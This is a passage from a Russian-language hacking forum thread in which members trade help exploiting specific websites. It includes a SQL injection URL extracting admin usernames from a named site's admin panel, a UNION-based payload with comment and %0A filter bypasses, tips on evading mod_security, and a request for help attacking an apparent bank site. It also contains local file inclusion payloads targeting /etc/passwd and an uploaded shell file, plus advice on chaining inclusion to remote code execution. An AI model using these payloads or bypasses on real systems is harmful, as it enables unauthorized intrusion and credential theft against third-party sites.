Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    163
    Likes Received:
    31
    Reputations:
    0
    Парни подскажите что можно попробовать в такой ситуации:

    par1=sleep(20) -> time = 20024 ms
    par1=eval(sleep(20)) -> time 2000ms
    и так далее....

    Как определить что за интерпретатор принимает параметр? Чей код инжектить?
     
  2. mcmagnus

    mcmagnus New Member

    Joined:
    24 Apr 2012
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Справшивал по phpbb 3.0.5 - есть в нем уязвимости??? Кто нибудь ответит??? ))
     
  3. brown

    brown New Member

    Joined:
    16 Oct 2016
    Messages:
    154
    Likes Received:
    4
    Reputations:
    0
    google phpbb 3.0.5 exploit
     
    mcmagnus likes this.
  4. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    210
    Likes Received:
    67
    Reputations:
    0
    Добрый подскажите, как раскрутить данную sql (параметр id)
    Авторизация:
    Code:
    bringthemes.com/natural-food/home-1/admin/ (demo/demo)
    Пробую:
    Code:
    bringthemes.com/natural-food/home-1/admin/index.php?route=extension/module/bringblog/comment&token=Hc0bs042rmLz50tctvPv2grNiWgYZqaF&id='+AND+EXTRACTVALUE(5632,CONCAT(0x3a,((select(substring(group_concat(username),1,32))from(oc_user)))))--+uHHl

    но в ответ постоянная загрузка и отрубает (Error - Connection reset)
    Подскажите что фильтрует и как обойти?
    обратил внимание что не нравится ему select и group_concat, но могу ошибаться в разных вариациях не выходит никак((
     
  5. SooLFaa

    SooLFaa Members of Antichat

    Joined:
    17 Mar 2014
    Messages:
    516
    Likes Received:
    473
    Reputations:
    145
    Зачем идти в Москву через Китай
    Code:
    http://bringthemes.com/natural-food/home-1/admin/index.php?route=extension/module/bringblog/comment&id=-1 union /*!12345select*/ 1,2,3,4,user(),version%0A(),7 --+uHHl&token=nGLvYhzmGxV0JoQDKfwjr1xiBwes8qoF
    Бапассить select можно старыми добрыми комментами
    А байпассить функции с помощью %0A перед ()

    UPD: И ты используешь error-based хотя здесь самый обычный UNION
     
    _________________________
    panic.ker, ACat, man474019 and 5 others like this.
  6. extjs

    extjs Member

    Joined:
    23 Jun 2013
    Messages:
    31
    Likes Received:
    6
    Reputations:
    0
    /vuln.php?id=-1+union+all+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23

    Как обойти фильтрацию? Дело в том, что если значение параметра содержит union и select, выводится ошибка типа hacking attemp. uni/**/on пробовал не помогает.
     
  7. SooLFaa

    SooLFaa Members of Antichat

    Joined:
    17 Mar 2014
    Messages:
    516
    Likes Received:
    473
    Reputations:
    145
    Таргет дай нормальный, векторов куча, если hacking attemp - это скорее всего mod security - он байпассится в том числе векторов на один пост выше
     
    _________________________
    Gorev likes this.
  8. mcmagnus

    mcmagnus New Member

    Joined:
    24 Apr 2012
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Благодарю, но хотелось бы развернутого ответа, если не сложно.
     
  9. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,594
    Likes Received:
    1,242
    Reputations:
    273
    /!*50000bla bla bla*/
     
  10. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    163
    Likes Received:
    31
    Reputations:
    0
    попробуй передать id с помощью POST
    Попробуй url encode
    Попробуй char encode
     
  11. sepo

    sepo Member

    Joined:
    21 Jan 2017
    Messages:
    49
    Likes Received:
    11
    Reputations:
    12
    всем привет,

    кто может, помогиет раскрутить эту скулю:

    Code:
    http://www.sala amsombank.com/pages.php?id=\
     
  12. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    163
    Likes Received:
    31
    Reputations:
    0
    с чего вы решили, что она раскручивабельна?
     
  13. sepo

    sepo Member

    Joined:
    21 Jan 2017
    Messages:
    49
    Likes Received:
    11
    Reputations:
    12
    всмысле??
     
  14. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    163
    Likes Received:
    31
    Reputations:
    0
  15. swat_

    swat_ Member

    Joined:
    4 Nov 2009
    Messages:
    170
    Likes Received:
    30
    Reputations:
    1
    подскажите пожалуйста есть ли в этом коде уязвимость ,если есть ток как её воспроизвести
    file.php?url=site.com%00 на такой запрос выдает ошибку
    Warning: include_once(): Failed opening 'site.com' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/site/public_html/domain.site.com/file.php on line 23

    PHP:
    <?php
    $url 
    = @$_REQUEST['url'];
    $currenturl =  explode("/",$url);
    $getlang "";
    //include the lang in this array
    $lanarray = array('en','hi','ar','cn','id','ms');
    if( @
    $currenturl[0]=='' || !in_array($currenturl[0],$lanarray))
    {
        
    $defaulLang ="en";
    }
    else
    {
        
    $defaulLang =@$currenturl[0];
    }
    $siteUrl "http://$_SERVER[HTTP_HOST]"."/~ttttt/domain.site.com/";
    $filepath 'lang/'.@$defaulLang.'.ini';
    if(
    file_exists($filepath))
    {
      
    $getlang =  parse_ini_file($filepath);
    }
    if(
    $url!='')
    {
        include_once 
    basename($url).".php";
    }
    else
    {
        include_once 
    "home.php";
    }

    ?>
     
  16. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    163
    Likes Received:
    31
    Reputations:
    0
    на сколько я понимаю - url=../../../etc/passwd%00
    url=../../../var/www/site/upload/evil_avatar_with_shell_code.gif%00
    при условии, что функция basename() нам ничего не портит.
     
    #1916 ACat, 12 Jun 2017
    Last edited: 13 Jun 2017
  17. swat_

    swat_ Member

    Joined:
    4 Nov 2009
    Messages:
    170
    Likes Received:
    30
    Reputations:
    1
    file.php?url=../../../etc/passwd%00
    Warning: include_once(): Failed opening 'passwd' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/site/public_html/domain.site.com/file.php on line 23
     
  18. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    163
    Likes Received:
    31
    Reputations:
    0
    http://www.php.su/functions/?basename
    Code:
     <?php
    $path = "/home/httpd/html/index.php";
    $file = basename($path);         // $file содержит "index.php"
    $file = basename($path, ".php"); // $file содержит "index"
    ?> 
    то бишь вектор сужается до дириктории, из которой выполняется сценарий.
     
  19. crlf

    crlf Members of Antichat

    Joined:
    18 Mar 2016
    Messages:
    498
    Likes Received:
    894
    Reputations:
    314
    Уязвимость есть, но не шибко юзабельная. Если положить или изменить любой файл в этой директории, будет RCE.
    Так же стоит посмотреть, можно ли там подцепить что-то интересное для дальнейшего развития атаки. Простейший пример:
    Уязвим index.php. Рядом лежит upload.php который подключается в admin.php. В админку стоит логин/пароль, а upload.php проверяет наличие коннекта к базе и не может быть вызван напрямую. Следовательно, воспользовавшись локальным инклудом в index.php можно подцепить скрипт загрузки и залить что-то нехорошее :)
     
    ACat likes this.
  20. IvanPa

    IvanPa New Member

    Joined:
    13 Jun 2017
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    всем привет. хочу в свой Интернет магазин впендюрить чат. Допустим клиент заходит на главную страницу сайта и появляется окно чата где оператор или бот ( вначале) помогает клиенту с выбором товара. Помогите оценить какие либо риски. Какие уязвимости стоит рассмотреть. Вообще большинство таких чатов представляют опасность ?
     
Loading...